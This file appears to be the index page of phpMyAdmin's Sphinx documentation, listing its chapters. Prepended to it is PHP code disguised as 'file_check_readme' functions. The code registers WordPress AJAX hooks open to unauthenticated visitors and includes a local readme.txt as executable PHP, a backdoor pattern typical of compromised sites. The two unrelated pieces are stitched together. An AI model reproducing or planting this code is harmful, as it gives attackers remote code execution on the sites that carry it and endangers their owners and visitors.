if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
.. phpMyAdmin documentation master file, created by sphinx-quickstart on Wed Sep 26 14:04:48 2012. You can adapt this file completely to your liking, but it should at least contain the root `toctree` directive. Welcome to phpMyAdmin's documentation! ====================================== Contents: .. toctree:: :maxdepth: 2 intro require setup config user faq developers security vendors copyright credits glossary Indices and tables ================== * :ref:`genindex` * :ref:`search` * :ref:`glossary`